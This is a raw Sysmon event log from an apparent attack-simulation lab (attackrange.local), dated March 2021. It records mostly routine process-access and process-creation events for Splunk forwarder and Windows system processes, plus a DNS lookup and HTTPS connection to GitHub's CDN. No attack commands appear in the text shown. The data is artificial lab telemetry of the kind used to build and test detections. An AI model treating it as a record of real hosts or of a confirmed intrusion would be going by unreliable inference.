21:50:02.460{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B40A-605B-2D5A-00000000AF01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638543Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B40A-605B-2D5A-00000000AF01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638542Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.461{BFB545BB-B40A-605B-2D5A-00000000AF01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000005917759Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.695{00000000-0000-0000-0000-000000000000}1220<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1507-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917758Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917757Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917756Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.739{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1508-false10.0.1.12-8000- 22542200x80000000000000005917755Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:58.699{00000000-0000-0000-0000-000000000000}1220raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005917782Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.876{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B1DF7792D8E3978910D6B0EB10C953,SHA256=ED1A8C91591E094715D970EE73835995E84477655FA8BCCE29010E74C887A11C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917781Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.876{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31D71773BEF527A40554E4686EA53568,SHA256=2B5A31C6CF602F3868E7535AF2C3547C96A6C36D45346993327436013FF2612D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638584Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B40B-605B-2F5A-00000000AF01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638583Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638582Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638581Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638580Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638579Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638578Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638577Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638576Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638575Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638574Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B864-6058-0500-00000000AF01}628744C:\Windows\system32\csrss.exe{BFB545BB-B40B-605B-2F5A-00000000AF01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638573Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B40B-605B-2F5A-00000000AF01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638572Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.804{BFB545BB-B40B-605B-2F5A-00000000AF01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000638571Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.288{BFB545BB-B40B-605B-2E5A-00000000AF01}5923164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638570Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B40B-605B-2E5A-00000000AF01}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638569Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638568Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638567Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638566Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638565Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:03.132{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638564Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 